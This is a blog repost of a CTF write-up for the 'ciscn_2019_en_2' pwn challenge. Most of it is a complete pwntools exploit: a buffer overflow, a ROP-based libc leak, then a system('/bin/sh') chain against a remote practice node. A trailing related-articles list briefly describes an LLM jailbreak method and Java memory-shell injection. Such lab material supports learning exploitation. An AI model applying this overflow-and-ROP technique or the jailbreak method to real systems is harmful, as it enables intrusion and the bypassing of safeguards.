ciscn_2019_en_2 1

news/2025/1/16 0:12:57/文章来源:https://www.cnblogs.com/fdddddd/p/18673951

打开ida
image

记得绕过加密,因为它会改变s里面的值

exp 
from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64')
context.log_level='debug'
io=remote('node5.buuoj.cn',26931)
elf = ELF('./ciscn_2019_en_2')
io.sendline(b'1')
main = elf.sym['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_addr=0x0400c83 
pop_ret_addr=0x04006b9
payload1=b'\x00'+cyclic(0x50-1+8)
payload1+=p64(pop_rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main)
io.sendlineafter('encrypted',payload1)
puts = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\0'))
print(hex(puts))
libc = LibcSearcher('puts',puts)
libc_base = puts - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
io.sendline(b'1')
payload2=b'\x00'+cyclic(0x50-1+8)
payload2+=p64(pop_ret_addr)+p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr)
io.sendlineafter('encrypted',payload2)
io.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/869857.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

低代码平台:2024 年国内主流平台盘点

低代码平台:2024 年国内主流平台盘点

在当今数字化转型的浪潮中,低代码平台作为一种高效的软件开发工具,正逐渐受到企业的广泛关注。它能够以更少的编码、更快的速度构建和交付应用软件,为企业带来诸多优势。本文将对低代码平台进行全面介绍,包括其定义、对企业的意义、企业级低代码平台的特色、国内主流平台盘…
阅读更多...
速看!国内外 7大企业AI知识库大盘点

速看!国内外 7大企业AI知识库大盘点

随着人工智能技术的飞速发展,AI知识库已成为企业智能化转型的重要基石。它不仅能够大幅提升知识检索效率,还能通过智能推荐与学习,不断优化知识库内容,助力企业决策与创新。本文将为您盘点国内外七家企业的AI知识库,探索其技术亮点与应用实践。1. HelpLook:智能知识管理的…
阅读更多...
vscode快捷上传博客园博文

vscode快捷上传博客园博文

vscode快速上传cnblogs md文件中的图片上传到博客园路径需要手动更新,这很傻。 vscode安装博客园插件:登录: 在左侧栏中:点击登录。接下来就可以爽起来了。 具体使用: 1、typora正常写md文件,这个方便简洁。 2、写完后用vscode打开这个文件,并点击右上角上传到博客。第一…
阅读更多...
ShellCheck工具:帮你发现Shell脚本安全隐患

ShellCheck工具:帮你发现Shell脚本安全隐患

作为一名运维工程师,你是否经常为Shell脚本中的各种隐藏bug而头疼?今天我要向大家推荐一个堪称"神器"的工具 - ShellCheck。它就像一位经验丰富的Shell编程导师,能够精准地发现你的脚本中的各种潜在问题,并给出专业的改进建议。它有多强? 想象一下,你有一位经验超过…
阅读更多...
1.C++基础入门

1.C++基础入门

C++基础入门。C++基础入门 1 C++初识 1.1 第一个C++程序 编写一个C++程序总共分为4个步骤创建项目 创建文件 编写代码 运行程序1.1.1 创建项目 ​ Visual Studio是我们用来编写C++程序的主要工具,我们先将它打开1.1.2 创建文件 右键源文件,选择添加->新建项给C++文件起个…
阅读更多...
【Java开发】实现 License 认证(只校验有效期)

【Java开发】实现 License 认证(只校验有效期)

一、License介绍 License也就是版权许可证书,一般用于收费软件给付费用户提供的访问许可证明 1.1 应用场景应用部署在客户的内网环境 这种情况开发者无法控制客户的网络环境,也不能保证应用所在服务器可以访问外网 因此通常的做法是使用服务器许可文件,在应用启动的时候加载…
阅读更多...
Proj CJI Paper Reading: AdaPPA: Adaptive Position Pre-Fill Jailbreak Attack Approach Targeting LLMs

Proj CJI Paper Reading: AdaPPA: Adaptive Position Pre-Fill Jailbreak Attack Approach Targeting LLMs

AbstractBackground: 目前的jailbreak mutator方式更集中在语义level,更容易被防御措施检查到 本文: AdaPPA (Adaptive Position Pre-Filled Jailbreak Attack) Task: adaptive position pre-fill jailbreak attack approach Method: 利用模型的instruction following能力,先…
阅读更多...
【Java安全】浅谈内存马

【Java安全】浅谈内存马

一、内存马概述1.1 内存马产生的背景1.2 Java内存马的基本原理1.3 Java内存马的类型1.4 Java内存马的使用场景二、内存马注入实战演示2.1 JSP注入Filter内存马2.2 Fastjson反序列化注入内存马2.3 注入Agent内存马三、内存马的检测与防御3.1 内存马定位排查思路3.2 工具查杀3.3 …
阅读更多...
黑狂野大数据4-flink

黑狂野大数据4-flink

阅读更多...
Diary - 2025.01.15

Diary - 2025.01.15

pkuwc 烂完了,😭😭😭其实是 pkuwc2024 的东西。 Day 0 坐飞机坐飞机,嘟嘟嘟。 大飞机!!!!!!!! 我觉得最厉害的是这个飞机有 3D 地图啊,太帅了!!!但是比较悲伤的是我直到要到了才知道,前面都在看 B 站缓存的视频😭。 感觉,太美丽了杭州!!! 坐飞机的时…
阅读更多...
floor_plan_meshproject增加角度正则损失

floor_plan_meshproject增加角度正则损失

数据结构 data.x #(128, 16) 16 = triangles(9) + confidence(7) """ 每个元素 [x1, y1, z1, x2, y2, z2, x3, y3, z3, c_v1, c_v2, c_v3, c_e1, c_e2, c_e3, c_f] """ data.y #(128)encoded_x #(128, 576) encoded_x_conv # (2, 96, 576) …
阅读更多...
2025.1.15 html基础

2025.1.15 html基础

学习了html的基础知识,包括:n越大,字体越小换行标签表示一个完整的段落水平线标签链接: 内容 例如: <! --a页面-->这是A页面。<! --b页面-->这是B页面。在浏览器中点击“这是A页面”,会跳转到b页面。
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023